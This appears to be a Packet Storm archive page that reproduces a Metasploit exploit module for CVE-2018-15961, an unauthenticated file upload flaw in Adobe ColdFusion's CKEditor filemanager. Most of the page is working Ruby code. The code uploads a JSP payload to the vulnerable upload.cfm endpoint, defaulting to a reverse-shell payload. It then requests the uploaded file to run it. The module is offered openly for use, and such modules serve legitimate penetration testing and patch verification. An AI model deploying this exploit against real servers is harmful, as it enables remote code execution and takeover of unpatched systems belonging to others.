what you don't know can hurt you

Adobe Coldfusion 11 CKEditor Arbitrary File Upload

Adobe Coldfusion 11 CKEditor Arbitrary File Upload
Posted Jan 10, 2019
Authored by Vahagn Vardanian, Pete Freitag de Foundeo, Qazeer | Site metasploit.com

A file upload vulnerability exists in the CKEditor of Adobe ColdFusion 11 (Update 14 and earlier).

tags | exploit, file upload
advisories | CVE-2018-15961
MD5 | 1295c307779f896cb864d27811f2dbd7

Adobe Coldfusion 11 CKEditor Arbitrary File Upload

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

Rank = ExcellentRanking

def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe ColdFusion CKEditor unrestricted file upload',
'Description' => %q{
A file upload vulnerability in the CKEditor of Adobe ColdFusion 11
(Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and
ColdFusion 2018 (July 12 release) allows unauthenticated remote
attackers to upload and execute JSP files through the filemanager
plugin.
Tested on Adobe ColdFusion 2018.0.0.310739.
},
'Author' =>
[
'Pete Freitag de Foundeo', # Vulnerability discovery
'Vahagn vah_13 Vardanian', # First public PoC
'Qazeer' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-15961' ],
[ 'BID', '105314' ],
[ 'URL', 'https://helpx.adobe.com/fr/security/products/coldfusion/apsb18-33.html' ]
],
'Privileged' => false,
'Platform' => %w{ linux win },
'Arch' => ARCH_JAVA,
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => %w{ linux win },
'Payload' => { 'DisableNops' => true },
'DefaultOptions' => {'PAYLOAD' => 'java/jsp_shell_reverse_tcp'}
}
]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'RPORT' => 8500 },
'DisclosureDate' => 'Sep 11 2018'
))

register_options [
OptString.new('TARGETURI', [ false, 'Base application path', '/' ]),
]
end

def exploit
filename = rand_text_alpha_upper(1..10) + '.jsp'

print_status("Uploading the JSP payload at #{target_uri}cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/#{filename}...")

mime = Rex::MIME::Message.new
mime.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
mime.add_part('path', 'text/plain', nil, 'form-data; name="path"')

post_str = mime.to_s
post_str.strip!

res = send_request_cgi({
'uri' => normalize_uri(target_uri, 'cf_scripts','scripts','ajax','ckeditor','plugins','filemanager','upload.cfm'),
'version' => '1.1',
'method' => 'POST',
'ctype' => 'multipart/form-data; boundary=' + mime.bound,
'data' => post_str,
})

unless res && res.code == 200
fail_with Failure::Unknown, 'Upload Failed...'
end

print_good('Upload succeeded! Executing payload...')

send_request_cgi({
'uri' => normalize_uri(target_uri, 'cf_scripts', 'scripts', 'ajax',
'ckeditor', 'plugins', 'filemanager', 'uploadedFiles', filename),
'method' => 'GET'
}, 5)

end
end
Login or Register to add favorites

File Archive:

June 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    10 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    15 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close